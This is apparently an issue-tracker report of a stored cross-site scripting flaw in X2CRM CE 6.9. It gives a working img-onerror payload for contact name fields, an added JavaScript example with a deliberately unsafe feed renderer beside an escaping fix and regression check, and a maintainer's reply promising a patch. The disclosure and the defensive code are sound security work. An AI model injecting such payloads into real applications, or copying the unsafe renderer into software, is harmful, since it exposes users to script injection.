Hi,
Description:
Create a contact with
first name: test"><img src=x onerror=prompt('@darknetguy');>
and last name: test2"><img src=x onerror=prompt('@darknetguy');>
(You can even delete the contact; it's worse!) XSS will run in all pages where the activity feed is present (in X2CRM CE V6.9).
Sample Pic:
Payload to use: "><img src=x onerror=prompt('@darknetguy');>
Tested on Windows 10 Firefox | Google Chrome // CentOS 7 Firefox | Chromium
BR,
Milad Fadavvi
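The report above describes contact names being concatenated into activity-feed markup without output encoding. The following is an added example, not X2CRM code: a minimal vulnerable renderer beside a hardened one that encodes the name for the HTML text and attribute contexts it lands in, plus a check a reviewer or test suite can run to confirm the quoted payload no longer produces a tag. The `/contacts/view` link target and the feed wording are placeholders.

```javascript
// Added example (not X2CRM's code): contextual output encoding for contact names
// rendered into an activity-feed entry. The payload string is the one quoted in the issue.
const PAYLOAD = '"><img src=x onerror=prompt(\'@darknetguy\');>';

// Encode for HTML text nodes and double-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: untrusted names concatenated straight into markup.
// The leading '">' in the payload closes the title attribute and the <a> start tag.
function renderFeedEntryUnsafe(first, last) {
  const name = `${first} ${last}`;
  return `<a href="/contacts/view" title="${name}">${name}</a> was created`; // placeholder href
}

// Hardened rendering: the same template, but every untrusted value is encoded.
function renderFeedEntrySafe(first, last) {
  const name = escapeHtml(`${first} ${last}`);
  return `<a href="/contacts/view" title="${name}">${name}</a> was created`; // placeholder href
}

// Regression check: does the fragment contain any tag other than the <a>...</a> we emitted?
function containsInjectedTag(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.some((t) => !/^<\/?a(\s|>)/.test(t));
}

// Defender-side input check: flag names carrying markup metacharacters for logging or review.
// This is a detection aid only; output encoding above is the actual fix.
function looksLikeMarkup(value) {
  return /[<>"']/.test(value);
}
```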
We will have this XSS fixed in our next release. Thank you for the info! I will keep this issue open until confirmation that the vector has been removed.
thechiangsta